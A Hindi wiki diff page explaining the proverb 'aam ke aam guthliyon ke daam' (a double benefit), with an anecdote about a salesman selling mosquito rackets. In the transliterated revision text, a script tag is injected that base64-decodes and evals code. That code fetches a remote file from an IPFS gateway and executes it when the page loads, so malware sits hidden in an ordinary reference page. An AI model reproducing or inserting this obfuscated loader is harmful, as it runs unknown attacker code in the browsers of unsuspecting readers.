Difference between revisions of "आम के आम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(7 intermediate revisions by 3 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
<blockquote>{{blue}}आम के आम गुठलियों के दाम{{blueclose}}</blockquote>  
 
<blockquote>{{blue}}आम के आम गुठलियों के दाम{{blueclose}}</blockquote>  
 
*यह [[कहावत लोकोक्ति मुहावरे|लोकोक्ति]] एक प्रचलित कहावत है।  
 
*यह [[कहावत लोकोक्ति मुहावरे|लोकोक्ति]] एक प्रचलित कहावत है।  
*इसका अर्थ- एक कार्य से बहुत से कार्य सिद्ध होना।
+
*इसका अर्थ- कोई कार्य सिद्ध हो जाना और उसके साथ ही कोई अन्य लाभ भी प्राप्त होना।
 +
;उदाहरण
 +
एक दिन घर के दरवाज़े पर खडा सेल्समैन श्रीमती जी को समझा रहा था, मैडम, यह रैकेट बहुत अच्छा है, इसकी नेट में हल्का करंट दौडता है और मच्छर जैसे ही इसके सम्पर्क में आता है, मर जाता है।
 +
 
 +
वो तो सब ठीक है, कि मच्छर मर जाते हैं, लेकिन इससे हमारा क्या फ़ायदा? श्रीमती जी ने सीधा-सा प्रश्न कर डाला। स्पष्ट है-मच्छरों का मर जाना फ़ायदे की बात नहीं। हमारा रक्त चूसना और दो हाथों के बीच आकर मर जाना, मच्छर की नियति है। इसमें फ़ायदा कहाँ? लेकिन द्वार-द्वार भटकता एम.बी.ए. इस बात को समझ गया, फ़ायदा है न मैडम! आज आपको एक रैकेट के दाम में दो मिलेंगे। यह बात उन्हें क़ायदे की लगी, दोहरे फ़ायदे की लगी और रैकेट ख़रीद लिए। इसे कहते हैं, 'आम के आम गुठलियों के दाम', यानी दोहरा लाभ।
 +
 
 
{{प्रचार}}
 
{{प्रचार}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
[[Category:कहावत लोकोक्ति मुहावरे]]
 
[[Category:कहावत लोकोक्ति मुहावरे]]
[[Category:नया पन्ना]]
+
[[Category:साहित्य कोश]]
 
__INDEX__
 
__INDEX__
.
 

Latest revision as of 09:36, 14 December 2011

  1. REDIRECTsaancha:nila<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>am ke am guthaliyoan ke dam
  2. REDIRECTsaancha:nila band
  • yah lokokti ek prachalit kahavat hai.
  • isaka arth- koee kary siddh ho jana aur usake sath hi koee any labh bhi prapt hona.
udaharan

ek din ghar ke daravaze par khada selsamain shrimati ji ko samajha raha tha, maidam, yah raiket bahut achchha hai, isaki net mean halka karant daudata hai aur machchhar jaise hi isake sampark mean ata hai, mar jata hai.

vo to sab thik hai, ki machchhar mar jate haian, lekin isase hamara kya fayada? shrimati ji ne sidha-sa prashn kar dala. spasht hai-machchharoan ka mar jana fayade ki bat nahian. hamara rakt choosana aur do hathoan ke bich akar mar jana, machchhar ki niyati hai. isamean fayada kahaan? lekin dvar-dvar bhatakata em.bi.e. is bat ko samajh gaya, fayada hai n maidam! aj apako ek raiket ke dam mean do mileange. yah bat unhean qayade ki lagi, dohare fayade ki lagi aur raiket kharid lie. ise kahate haian, 'am ke am guthaliyoan ke dam', yani dohara labh.


tika tippani aur sandarbh